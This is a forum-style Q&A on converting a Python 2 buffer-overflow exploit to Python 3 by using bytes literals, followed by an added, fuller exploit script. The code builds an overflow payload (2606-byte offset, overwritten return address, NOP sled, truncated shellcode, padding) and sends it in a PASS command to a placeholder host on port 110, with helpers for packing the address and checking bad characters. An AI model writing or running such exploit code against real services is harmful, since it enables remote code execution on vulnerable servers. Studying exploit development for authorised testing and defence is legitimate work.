Exploit development in Python 3


Question

I realised that exploit development with Python 3 is not as straightforward as it is using Python 2.

As I understand, this is mainly due to the socket library and the added bytes datatype.

For example, I could not figure out how to translate the following code into Python 3 code:

--- SNIP ---
shellcode =  ""
shellcode += "\x89\xe2\xd9\xcf\xd9\x72\xf4\x5a\x4a\x4a\x4a\x4a\x4a"
--- SNIP ---
offset = "A" * 2606
eip = "\x43\x62\x4b\x5f"
nop = "\x90" * 16 
padding = "C"
buff = offset + eip + nop + shellcode + padding * (424 - 351 - 16)
--- SNIP ---
bytes_sent = sock.send("PASS {}\r\n".format(buff))
--- SNIP ---

I tried the following:

--- SNIP ---
shellcode =  ""
shellcode += "\x89\xe2\xd9\xcf\xd9\x72\xf4\x5a\x4a\x4a\x4a\x4a\x4a"
--- SNIP ---
offset = "A" * 2606
eip = "\x43\x62\x4b\x5f"
nop = "\x90" * 16 
padding = "C"
buff = offset + eip + nop + shellcode + padding * (424 - 351 - 16)
--- SNIP ---
bytes_sent = sock.send("PASS {}".format(buff).encode("UTF-8"))
--- SNIP ---

The problem is that \x90 becomes C2 90 in memory; it took me hours to figure out that the issue came from my code. I also suspect that this could alter the shellcode as well.

I would like to learn the proper way of doing this in Python.

Answer

The Python 2 code essentially builds up a byte string. In Python 3, '...' string literals build up a Unicode string object instead.

In Python 3, you want bytes objects instead, which you can create by using b'...' byte string literals:

# --- SNIP ---
shellcode =  b""
shellcode += b"\x89\xe2\xd9\xcf\xd9\x72\xf4\x5a\x4a\x4a\x4a\x4a\x4a"
# --- SNIP ---
offset = b"A" * 2606
eip = b"\x43\x62\x4b\x5f"
nop = b"\x90" * 16 
padding = b"C"
buff = offset + eip + nop + shellcode + padding * (424 - 351 - 16)
# --- SNIP ---
bytes_sent = sock.send(b"PASS %s\r\n" % buff)
# --- SNIP ---

bytes doesn't have a .format() method, but the % formatting operation is still available.
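The following is an added example, not code from the question or the answer above. It shows in one place why "\x90".encode("UTF-8") produced C2 90 (and why latin-1 would not), rebuilds the same buffer layout purely from bytes objects, and adds the check a practitioner wants before sending: that no byte in the buffer will terminate or split the PASS line. The struct.pack form of the return address (0x5F4B6243 is my reading of the post's b"\x43\x62\x4b\x5f"), the tail_len parameter (the post's constant 424 - 351 - 16 with a 351-byte shellcode), the find_bad_chars helper and the send_payload helper are my additions; the shellcode stub is the truncated one from the post, so the total length here is not the author's.

```python
import socket
import struct

# Shellcode stub copied from the post; the full payload is elided ("--- SNIP ---")
# there as well, so the length here does not match the author's 351 bytes.
SHELLCODE = b"\x89\xe2\xd9\xcf\xd9\x72\xf4\x5a\x4a\x4a\x4a\x4a\x4a"


def utf8_vs_raw(text):
    """Show why str.encode("UTF-8") corrupted the buffer.

    Every code point above U+007F becomes two or more UTF-8 bytes, so "\\x90"
    turns into b"\\xc2\\x90". Latin-1 maps code points 0-255 to single bytes and
    is the only str encoding that round-trips an arbitrary 8-bit payload.
    """
    return text.encode("utf-8"), text.encode("latin-1")


def build_payload(shellcode, offset=2606, eip=0x5F4B6243, nop_len=16, tail_len=424):
    """Build the same layout as the post, entirely with bytes objects.

    offset   bytes of "A" up to the saved return address (2606 in the post)
    eip      return address packed little-endian; 0x5F4B6243 reproduces the
             post's b"\\x43\\x62\\x4b\\x5f" (my reading of that literal)
    nop_len  NOP sled length (16 in the post)
    tail_len total bytes after EIP (424 in the post); the post's constant
             424 - 351 - 16 is this value with a 351-byte shellcode (assumption)
    """
    pad_len = tail_len - nop_len - len(shellcode)
    if pad_len < 0:
        raise ValueError("shellcode does not fit in the %d-byte tail" % tail_len)
    buff = b"A" * offset
    buff += struct.pack("<I", eip)   # same bytes as b"\x43\x62\x4b\x5f"
    buff += b"\x90" * nop_len        # one byte per NOP, no UTF-8 expansion
    buff += shellcode
    buff += b"C" * pad_len
    return buff


def build_command(buff):
    """Wrap the buffer in the PASS command; bytes supports % but not .format()."""
    return b"PASS %s\r\n" % buff


def find_bad_chars(payload, bad=b"\x00\x0a\x0d"):
    """Return (index, value) for every byte that would truncate or split the
    command: NUL for C string handling, CR/LF because the protocol line ends
    there. Passing bad=b"\\xc2\\xc3" spots the UTF-8 expansion from the question.
    """
    return [(i, b) for i, b in enumerate(payload) if b in bad]


def send_payload(host, port, payload):
    """Send the raw bytes; sock.send/sendall take bytes, never str, in Python 3.
    Returns the number of bytes handed to sendall (it raises on failure)."""
    cmd = build_command(payload)
    with socket.create_connection((host, port), timeout=5) as sock:
        sock.recv(1024)  # service banner, discarded
        sock.sendall(cmd)
    return len(cmd)


if __name__ == "__main__":
    payload = build_payload(SHELLCODE)
    print(utf8_vs_raw("\x90"))  # (b'\xc2\x90', b'\x90')
    print(len(payload), find_bad_chars(payload))
    # send_payload("192.0.2.10", 110, payload)  # placeholder target, not from the post
```

Run the bad-character check against the real bad-character list for the target before sending; the default here is only the minimum for a CRLF-terminated text command.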
